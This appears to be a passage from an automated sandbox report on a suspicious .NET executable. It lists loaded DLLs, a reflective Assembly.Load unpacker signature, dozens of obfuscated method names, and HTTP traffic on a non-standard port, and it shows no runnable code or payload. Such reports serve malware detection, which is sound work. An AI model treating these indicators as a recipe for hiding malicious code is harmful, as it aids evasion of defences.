Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 8ZVd2S51fr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 8ZVd2S51fr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 8ZVd2S51fr.exe, InnerForm.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	.Net Code: bxY2kM7d3g System.Reflection.Assembly.Load(byte[])
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	.Net Code: bxY2kM7d3g System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_009DDB84 pushfd ; ret	0_2_009DDB89
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D18530 push eax; retf	0_2_06D18531
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Code function: 0_2_06D142D9 push ebx; ret	0_2_06D142DA

Source: 8ZVd2S51fr.exe

Static PE information: section name: .text entropy: 7.402732015267434

Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, bEhqM5ZZCQhX89Q5enI.cs	High entropy of concatenated method names: 'QUxPcKuGAU', 'ag9PzoUHZB', 'uiEI1dssCU', 'rrsIZPv2y8', 'fVZIO0U2Ax', 'y08IhHRDB0', 'v7EI2Ujypa', 'K0SIqcEmDP', 'wv7Iy2Kf8D', 'anGI0tAoCi'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, IAg7NKUR3kgp4q0xRw.cs	High entropy of concatenated method names: 'UCIuJwEO5f', 'wkYuKNec52', 'u26ux7Y047', 'xypu8EJjpi', 'MGFu7da6Bp', 'c5QuwGg4fV', 'z4uu5jQI9g', 'p6EuvrbDMF', 'bQTui99CMP', 'F14unOKcqy'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, oYK3x0Ru2C5rWqElu3.cs	High entropy of concatenated method names: 'z0b04S6HCf', 'e6a0CuTYdv', 'vys0Vp4V4q', 'dDv0BghEpq', 'xb90rKRd2B', 'pbn0SVPvhc', 'd4I0AwtCtS', 'X0Q0XfSCxH', 'OfS0UZTix8', 'Lap0c7LhET'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, yQu6tF22M8W484FORg.cs	High entropy of concatenated method names: 'VYHZ6YK3x0', 'r2CZQ5rWqE', 'fW3ZGv5LH3', 'QKgZT4YZpg', 'bPdZHcIPvv', 'QPKZWignJ5', 'MTj9sKBtH3H7gym7qJ', 'Y42lMFRJfG1fPZhTc4', 'tYnZZC4CwU', 'mSZZh09bql'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, wH8QehZ1oeACDkEWb7t.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DoaPajfJsY', 'zbwPpQ5Ott', 'j7sPFRixJY', 'ci7P4mw28b', 'YHtPC4ufJZ', 'U4ZPVkfNkb', 'j3YPBBvyog'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, cinRt35NIMAOHK6eiS.cs	High entropy of concatenated method names: 'sQa6yIyu6Q', 'oD469ApGrI', 'yOt6thO6Mf', 'QCxtc7S3lb', 'CFetzlZD6P', 'Nt561fYLWV', 'mIw6ZaBpub', 'mW26OGnZ0F', 'Uep6hbeMed', 'FIj62nGvWM'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, PKsLiyiEl5xcG1fKyL.cs	High entropy of concatenated method names: 'X416NV47Hl', 'qGL6eqUJe1', 'Fr26kFJ5wb', 'Fbj6lfQDQE', 'jXM6f9gtf3', 'GFX6jwgPx2', 'QmG6YlVQby', 'jKq6RXVs8s', 'P2l6mllM4g', 'Obt6M7sIbA'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, wamIMqmW3v5LH3FKg4.cs	High entropy of concatenated method names: 'Ac59l1vvaa', 'Aqa9j4LoB6', 'KiS9R3la3n', 'Gpi9mBrlsx', 'c6n9Hk6mEF', 'VJH9WSAhQD', 'RJ49g0eq34', 'Bvw9DMJ65P', 'xcJ9uaT7px', 'fah9PZ2faw'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, CGCus9OeR63dlCFm6q.cs	High entropy of concatenated method names: 'd8BkW4E7a', 'et7ljwBvG', 'jCMjbAjDj', 'cOIY4TfJQ', 'ruNm62pui', 'XVJM5y3b9', 'oKRb2L6LDUPixAPvgP', 'mrVisOPuH0uN1jcCog', 'P41DjApav', 'xYNP9yRME'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, EhOrDjAEFDtrdp6tj2.cs	High entropy of concatenated method names: 'M4wuHQoOOe', 'McOugev3gq', 'efsuu6m6Qg', 'adjuIOuiGp', 'CfLubkbO2f', 'WRVuLx0NGK', 'Dispose', 'CCVDyyWYIE', 'euQD0sLu1a', 'sSCD9FoA2P'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, m3jLteZ25vfaSRUDUPG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'p8hEuX94QV', 'fmCEPh63XT', 'oQpEIlj3d8', 'iX3EE8VOkT', 'Fl7EbRqquZ', 'xvYE3sMR2Z', 'bwqELrBM54'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, VgDh0ecPZ3tUsv7DYO.cs	High entropy of concatenated method names: 'r3qP9Ar1KZ', 'gIGPdq29W2', 'frTPtPUAFx', 'RvmP6OEfFN', 'OkEPuZKQxH', 'K74PQGnDpZ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, kPbqap9b6ee5sfL9qe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gnEOUCpeAY', 'dVAOcnjHiO', 'Pq6OzeHmNs', 'yjGh1BtEHC', 'beZhZb71b4', 'DM2hOXFb0o', 'MWUhhQ7fER', 'tS59EU5HPODKJsNXPDm'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, w0AceD0qTP3nKoxV3J.cs	High entropy of concatenated method names: 'Dispose', 'rtrZUdp6tj', 'JBXOKlLIpt', 'NInnpCwVCe', 'dwtZcR8iWS', 'bEbZz7T5oJ', 'ProcessDialogKey', 'Wj8O1Ag7NK', 'E3kOZgp4q0', 'IRwOOAgDh0'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, SJWk71Ko3NRmr18Hm2.cs	High entropy of concatenated method names: 'c589gEpvU3lOwFjlBoh', 'bRrIXTp0DEUmUQTvLDf', 'HjntDaglbZ', 'zhLtuxCfwT', 'DlatPGKQDd', 'amL185p18kk63r19qCs', 'EAI7LmpXbKE78ajf6ie', 'SCge5EpbiC5uOiLJX7i'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, CVmYouVdmsNASJphKF.cs	High entropy of concatenated method names: 'ToString', 'SiuWatbEkN', 'ryaWKvY63b', 'FmCWxILZ9m', 'B4ZW8tpMXS', 'k9dW7V89fP', 'RToWw6L8r4', 'LlQW5QYMPh', 'DAYWvULZA1', 'VqQWi1CsHd'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, KORY3x46rOoug4iyxA.cs	High entropy of concatenated method names: 'tk5Hnn5BYB', 'iCLHpIlJBo', 'z1bH43T97A', 'gcSHC6BSiS', 'dXLHKf8Ahs', 'gUYHxjlR4g', 'r2cH84hA2H', 'RynH7kVu8d', 'yL8HwoN2y5', 'xYfH5iFIC7'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, rLuVGvzWrLpWYpPv71.cs	High entropy of concatenated method names: 'J3MPjSEOgx', 'U1iPR25i8f', 'a0lPm0J0fp', 'FO9PJAq715', 'z8sPKCJ1aE', 'CqZP85fLbO', 'TU2P7UGJWi', 'MMZPLiNJqt', 'cU8PNEXsR3', 'aNOPekEY1D'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, svvFPKJignJ5Ts36Vp.cs	High entropy of concatenated method names: 'iGktqIsL6f', 'hnPt0sZfTZ', 'Vi1tdBrCvG', 'YVet6B8gtY', 'zidtQZcSY9', 'cCddr2J65V', 'BXmdSO2vR2', 'Ut6dAyhbjN', 'Bo1dXLC5yN', 'N0QdUAGGjJ'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, CZpgpXMi1gYVYZPdcI.cs	High entropy of concatenated method names: 'KWkdfGZFqk', 'O1PdYeXgWr', 'Ab79x4AcyE', 'x1698sMEst', 'BuG97VVsIh', 'OJx9wUATFv', 'uEq950yc2U', 'frA9vFrp5y', 'lcF9iheaG8', 'etx9nZ3f1v'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	High entropy of concatenated method names: 'tVhhqxkQef', 'm0HhyjQoxV', 'qREh0KW0fG', 'wdFh9DHPAb', 'yEbhd21Uob', 'nOghtMUPSh', 'mw2h6FlnVT', 'dgshQOBbOT', 'bOBhoHTULU', 'gkghGKn1Fv'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, lTvbEvSWfwFfI5mwE4.cs	High entropy of concatenated method names: 'iJpgXSKs41', 'WkJgcIxsjF', 'SK0D1LQ4NW', 'x1vDZADNiA', 'iIwgaiZbfv', 'NP0gpOb2Jw', 'E0FgFdBJGh', 'btgg4pSAi2', 'pKpgCiZ81e', 'SoYgVJaZTY'
Source: 0.2.8ZVd2S51fr.exe.7220000.4.raw.unpack, cfPZyoFF54DbQCOWPf.cs	High entropy of concatenated method names: 'nmKsRGdeZc', 'G46smO8awj', 'cGisJ30lLH', 'cSssKPduxM', 'n4Ss8IHoJX', 'PZ3s70vDgp', 'gTLs5TrR1a', 'xEksvwUk6w', 'JLFsnk1goT', 'y1GsaC1U0K'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, bEhqM5ZZCQhX89Q5enI.cs	High entropy of concatenated method names: 'QUxPcKuGAU', 'ag9PzoUHZB', 'uiEI1dssCU', 'rrsIZPv2y8', 'fVZIO0U2Ax', 'y08IhHRDB0', 'v7EI2Ujypa', 'K0SIqcEmDP', 'wv7Iy2Kf8D', 'anGI0tAoCi'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, IAg7NKUR3kgp4q0xRw.cs	High entropy of concatenated method names: 'UCIuJwEO5f', 'wkYuKNec52', 'u26ux7Y047', 'xypu8EJjpi', 'MGFu7da6Bp', 'c5QuwGg4fV', 'z4uu5jQI9g', 'p6EuvrbDMF', 'bQTui99CMP', 'F14unOKcqy'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, oYK3x0Ru2C5rWqElu3.cs	High entropy of concatenated method names: 'z0b04S6HCf', 'e6a0CuTYdv', 'vys0Vp4V4q', 'dDv0BghEpq', 'xb90rKRd2B', 'pbn0SVPvhc', 'd4I0AwtCtS', 'X0Q0XfSCxH', 'OfS0UZTix8', 'Lap0c7LhET'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, yQu6tF22M8W484FORg.cs	High entropy of concatenated method names: 'VYHZ6YK3x0', 'r2CZQ5rWqE', 'fW3ZGv5LH3', 'QKgZT4YZpg', 'bPdZHcIPvv', 'QPKZWignJ5', 'MTj9sKBtH3H7gym7qJ', 'Y42lMFRJfG1fPZhTc4', 'tYnZZC4CwU', 'mSZZh09bql'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, wH8QehZ1oeACDkEWb7t.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DoaPajfJsY', 'zbwPpQ5Ott', 'j7sPFRixJY', 'ci7P4mw28b', 'YHtPC4ufJZ', 'U4ZPVkfNkb', 'j3YPBBvyog'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, cinRt35NIMAOHK6eiS.cs	High entropy of concatenated method names: 'sQa6yIyu6Q', 'oD469ApGrI', 'yOt6thO6Mf', 'QCxtc7S3lb', 'CFetzlZD6P', 'Nt561fYLWV', 'mIw6ZaBpub', 'mW26OGnZ0F', 'Uep6hbeMed', 'FIj62nGvWM'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, PKsLiyiEl5xcG1fKyL.cs	High entropy of concatenated method names: 'X416NV47Hl', 'qGL6eqUJe1', 'Fr26kFJ5wb', 'Fbj6lfQDQE', 'jXM6f9gtf3', 'GFX6jwgPx2', 'QmG6YlVQby', 'jKq6RXVs8s', 'P2l6mllM4g', 'Obt6M7sIbA'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, wamIMqmW3v5LH3FKg4.cs	High entropy of concatenated method names: 'Ac59l1vvaa', 'Aqa9j4LoB6', 'KiS9R3la3n', 'Gpi9mBrlsx', 'c6n9Hk6mEF', 'VJH9WSAhQD', 'RJ49g0eq34', 'Bvw9DMJ65P', 'xcJ9uaT7px', 'fah9PZ2faw'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, CGCus9OeR63dlCFm6q.cs	High entropy of concatenated method names: 'd8BkW4E7a', 'et7ljwBvG', 'jCMjbAjDj', 'cOIY4TfJQ', 'ruNm62pui', 'XVJM5y3b9', 'oKRb2L6LDUPixAPvgP', 'mrVisOPuH0uN1jcCog', 'P41DjApav', 'xYNP9yRME'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, EhOrDjAEFDtrdp6tj2.cs	High entropy of concatenated method names: 'M4wuHQoOOe', 'McOugev3gq', 'efsuu6m6Qg', 'adjuIOuiGp', 'CfLubkbO2f', 'WRVuLx0NGK', 'Dispose', 'CCVDyyWYIE', 'euQD0sLu1a', 'sSCD9FoA2P'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, m3jLteZ25vfaSRUDUPG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'p8hEuX94QV', 'fmCEPh63XT', 'oQpEIlj3d8', 'iX3EE8VOkT', 'Fl7EbRqquZ', 'xvYE3sMR2Z', 'bwqELrBM54'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, VgDh0ecPZ3tUsv7DYO.cs	High entropy of concatenated method names: 'r3qP9Ar1KZ', 'gIGPdq29W2', 'frTPtPUAFx', 'RvmP6OEfFN', 'OkEPuZKQxH', 'K74PQGnDpZ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, kPbqap9b6ee5sfL9qe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gnEOUCpeAY', 'dVAOcnjHiO', 'Pq6OzeHmNs', 'yjGh1BtEHC', 'beZhZb71b4', 'DM2hOXFb0o', 'MWUhhQ7fER', 'tS59EU5HPODKJsNXPDm'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, w0AceD0qTP3nKoxV3J.cs	High entropy of concatenated method names: 'Dispose', 'rtrZUdp6tj', 'JBXOKlLIpt', 'NInnpCwVCe', 'dwtZcR8iWS', 'bEbZz7T5oJ', 'ProcessDialogKey', 'Wj8O1Ag7NK', 'E3kOZgp4q0', 'IRwOOAgDh0'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, SJWk71Ko3NRmr18Hm2.cs	High entropy of concatenated method names: 'c589gEpvU3lOwFjlBoh', 'bRrIXTp0DEUmUQTvLDf', 'HjntDaglbZ', 'zhLtuxCfwT', 'DlatPGKQDd', 'amL185p18kk63r19qCs', 'EAI7LmpXbKE78ajf6ie', 'SCge5EpbiC5uOiLJX7i'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, CVmYouVdmsNASJphKF.cs	High entropy of concatenated method names: 'ToString', 'SiuWatbEkN', 'ryaWKvY63b', 'FmCWxILZ9m', 'B4ZW8tpMXS', 'k9dW7V89fP', 'RToWw6L8r4', 'LlQW5QYMPh', 'DAYWvULZA1', 'VqQWi1CsHd'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, KORY3x46rOoug4iyxA.cs	High entropy of concatenated method names: 'tk5Hnn5BYB', 'iCLHpIlJBo', 'z1bH43T97A', 'gcSHC6BSiS', 'dXLHKf8Ahs', 'gUYHxjlR4g', 'r2cH84hA2H', 'RynH7kVu8d', 'yL8HwoN2y5', 'xYfH5iFIC7'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, rLuVGvzWrLpWYpPv71.cs	High entropy of concatenated method names: 'J3MPjSEOgx', 'U1iPR25i8f', 'a0lPm0J0fp', 'FO9PJAq715', 'z8sPKCJ1aE', 'CqZP85fLbO', 'TU2P7UGJWi', 'MMZPLiNJqt', 'cU8PNEXsR3', 'aNOPekEY1D'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, svvFPKJignJ5Ts36Vp.cs	High entropy of concatenated method names: 'iGktqIsL6f', 'hnPt0sZfTZ', 'Vi1tdBrCvG', 'YVet6B8gtY', 'zidtQZcSY9', 'cCddr2J65V', 'BXmdSO2vR2', 'Ut6dAyhbjN', 'Bo1dXLC5yN', 'N0QdUAGGjJ'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, CZpgpXMi1gYVYZPdcI.cs	High entropy of concatenated method names: 'KWkdfGZFqk', 'O1PdYeXgWr', 'Ab79x4AcyE', 'x1698sMEst', 'BuG97VVsIh', 'OJx9wUATFv', 'uEq950yc2U', 'frA9vFrp5y', 'lcF9iheaG8', 'etx9nZ3f1v'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, AGcaXeQZhmCs1nYfDe.cs	High entropy of concatenated method names: 'tVhhqxkQef', 'm0HhyjQoxV', 'qREh0KW0fG', 'wdFh9DHPAb', 'yEbhd21Uob', 'nOghtMUPSh', 'mw2h6FlnVT', 'dgshQOBbOT', 'bOBhoHTULU', 'gkghGKn1Fv'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, lTvbEvSWfwFfI5mwE4.cs	High entropy of concatenated method names: 'iJpgXSKs41', 'WkJgcIxsjF', 'SK0D1LQ4NW', 'x1vDZADNiA', 'iIwgaiZbfv', 'NP0gpOb2Jw', 'E0FgFdBJGh', 'btgg4pSAi2', 'pKpgCiZ81e', 'SoYgVJaZTY'
Source: 0.2.8ZVd2S51fr.exe.3887020.0.raw.unpack, cfPZyoFF54DbQCOWPf.cs	High entropy of concatenated method names: 'nmKsRGdeZc', 'G46smO8awj', 'cGisJ30lLH', 'cSssKPduxM', 'n4Ss8IHoJX', 'PZ3s70vDgp', 'gTLs5TrR1a', 'xEksvwUk6w', 'JLFsnk1goT', 'y1GsaC1U0K'

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49715

Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8ZVd2S51fr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
